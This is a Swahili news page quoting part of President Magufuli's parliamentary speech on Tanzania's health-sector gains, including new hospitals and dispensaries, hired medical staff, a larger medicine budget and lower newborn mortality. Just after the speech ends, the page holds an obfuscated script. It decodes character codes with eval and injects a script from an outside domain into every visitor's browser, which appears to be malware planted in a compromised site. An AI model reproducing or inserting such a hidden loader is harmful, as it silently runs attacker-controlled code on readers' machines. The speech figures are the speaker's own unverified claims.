Na WAMJW- Dom – Afya.
.
. “Kwa upande wa sekta ya afya, tumeongeza idadi ya vituo vya kutolea huduma za afya 1,769 zikiwemo zahanati 1,198, vituo vya afya 487, ambavyo ninyi waheshimiwa Wabunge ni mashahidi katika majimbo yenu….”.
.
.
“Tumeongeza Hospitali za Wilaya 71, Hospitali za Mikoa 10 ikiwemo Hospitali ya mkoa wa Mara ambayo ni Mwalimu Nyerere Memorial Hospital ambayo ujenzi wake ulikwama tangu miaka ya 1970…”.
.
.
“Vilevile Waheshiwa tumejenga Hospitali za Rufaa za Kanda Tatu, hii imefanya vituo vya kutolea huduma za afya kuongezeka kutoka 7,014 mwaka 2015 hadi kufikia 8,783 hivi sasa.”.
.
.
“Zaidi ya hapo Waheshimiwa Wabunge tumeajiri watumishi wa Afya wapya wapatao 14,479 wakiwemo madaktari 1,000 walioajiriwa hivi karibuni. Hii imeongeza idadi ya watumishi wa afya nchini kutoka 86,152 mwaka 2015 hadi 100,631 mwaka 2020.”.
.
.
“Tumeimarisha pia upatikanaji wa dawa na vifaa tiba ambapo tuliongeza bajeti yake kutoka shilingi bilioni 31 mwaka 2015 hadi shilingi bilioni 270 hivi sasa.”.
.
.
“Na pia tumenunua na kusambaza magari ya kubebea wagonjwa (Ambulance) 117. Vilevile tumefanikiwa kusomesha madaktari bingwa 301 ambao wamewezesha kuimarisha matibabu ya kibingwa nchini hususani kwa magonjwa ya moyo, masikio, figo, mifupa, mgongo, kansa, n.k.”.
.
.
“Kutokana na hatua hizo idadi ya kinamama wanaojifungua kwenye vituo vya kutolea huduma za afya imeongezeka kutoka asilimia 64 mwaka 2015 hadi kufikia asilimia 83 hivi sasa.”.
.
.
“Vifo vya watoto wachanga wenye chini ya siku 28 vimepungua sana kutoka wastani wa vivo 25 hadi wastani wa vifo 7 kwa kila vizazi hai 1,000.”.
.
.
“Na idadi ya Rufaa kwenda nje ya nchi, nazo zimepungua kwa asilimia 95. Aidha, kutokana na kuimarishwa kwa matibabu ya kibingwa baadhi ya wagonjwa kutoka mataifa jirani wameanza kuja kutibiwa nchini, hususani magonjwa ya moyo.”.
.
.
“Hii inadhihirisha kuwa tumefanya kazi kubwa saana katika kuboresha na kuimarisha Sekta ya Afya nchini. Ninyi Waheshimiwa Wabunge ni mashahidi.”.
.
.
Mwisho.
SEHEMU YA HOTUBA YA MHE RAIS MAGUFULI JANA KUHUSIANA NA WIZARA YA AFYA
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments